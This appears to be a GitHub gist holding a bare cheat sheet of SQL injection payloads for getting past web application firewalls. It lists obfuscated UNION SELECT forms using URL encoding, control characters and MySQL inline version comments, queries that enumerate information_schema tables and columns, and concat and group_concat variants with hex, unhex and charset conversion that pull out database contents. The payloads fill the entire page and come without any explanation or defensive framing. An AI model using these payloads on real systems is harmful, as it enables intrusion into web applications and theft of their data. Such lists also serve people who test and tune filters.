+UNunionION+SEselectLECT+ | |
+uni%0bon+se%0blect+ | |
%252f%252a*/union%252f%252a /select%252f%252a*/ | |
/%2A%2A/union/%2A%2A/select/%2A%2A/ | |
%2f**%2funion%2f**%2fselect%2f**%2f | |
union%23foo*%2F*bar%0D%0Aselect%23foo%0D%0A | |
/*!UnIoN*/SeLecT+ | |
========================================================================================== | |
[~] information_schema.tables [~] | |
/*!froM*/ /*!InfORmaTion_scHema*/.tAblES /*!WhERe*/ /*!TaBle_ScHEmA*/=schEMA()-- - | |
/*!froM*/ /*!InfORmaTion_scHema*/.tAblES /*!WhERe*/ /*!TaBle_ScHEmA*/ like schEMA()-- - | |
/*!froM*/ /*!InfORmaTion_scHema*/.tAblES /*!WhERe*/ /*!TaBle_ScHEmA*/=database()-- - | |
/*!froM*/ /*!InfORmaTion_scHema*/.tAblES /*!WhERe*/ /*!TaBle_ScHEmA*/ like database()-- - | |
/*!FrOm*/+%69nformation_schema./**/columns+/*!50000Where*/+/*!%54able_name*/=hex table | |
/*!FrOm*/+information_schema./**/columns+/*!12345Where*/+/*!%54able_name*/ like hex table | |
========================================================================================== | |
[~] concat() [~] | |
CoNcAt() | |
concat() | |
CON%08CAT() | |
CoNcAt() | |
%0AcOnCat() | |
/**//*!12345cOnCat*/ | |
/*!50000cOnCat*/(/*!*/) | |
unhex(hex(concat(table_name))) | |
unhex(hex(/*!12345concat*/(table_name))) | |
unhex(hex(/*!50000concat*/(table_name))) | |
========================================================================================== | |
[~] group_concat() [~] | |
/*!group_concat*/() | |
gRoUp_cOnCAt() | |
group_concat(/*!*/) | |
group_concat(/*!12345table_name*/) | |
group_concat(/*!50000table_name*/) | |
/*!group_concat*/(/*!12345table_name*/) | |
/*!group_concat*/(/*!50000table_name*/) | |
/*!12345group_concat*/(/*!12345table_name*/) | |
/*!50000group_concat*/(/*!50000table_name*/) | |
/*!GrOuP_ConCaT*/() | |
/*!12345GroUP_ConCat*/() | |
/*!50000gRouP_cOnCaT*/() | |
/*!50000Gr%6fuP_c%6fnCAT*/() | |
unhex(hex(group_concat(table_name))) | |
unhex(hex(/*!group_concat*/(/*!table_name*/))) | |
unhex(hex(/*!12345group_concat*/(table_name))) | |
unhex(hex(/*!12345group_concat*/(/*!table_name*/))) | |
unhex(hex(/*!12345group_concat*/(/*!12345table_name*/))) | |
unhex(hex(/*!50000group_concat*/(table_name))) | |
unhex(hex(/*!50000group_concat*/(/*!table_name*/))) | |
unhex(hex(/*!50000group_concat*/(/*!50000table_name*/))) | |
convert(group_concat(table_name)+using+ascii) | |
convert(group_concat(/*!table_name*/)+using+ascii) | |
convert(group_concat(/*!12345table_name*/)+using+ascii) | |
convert(group_concat(/*!50000table_name*/)+using+ascii) | |
CONVERT(group_concat(table_name)+USING+latin1) | |
CONVERT(group_concat(table_name)+USING+latin2) | |
CONVERT(group_concat(table_name)+USING+latin3) | |
CONVERT(group_concat(table_name)+USING+latin4) | |
CONVERT(group_concat(table_name)+USING+latin5) | |
==========================================================================================` |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment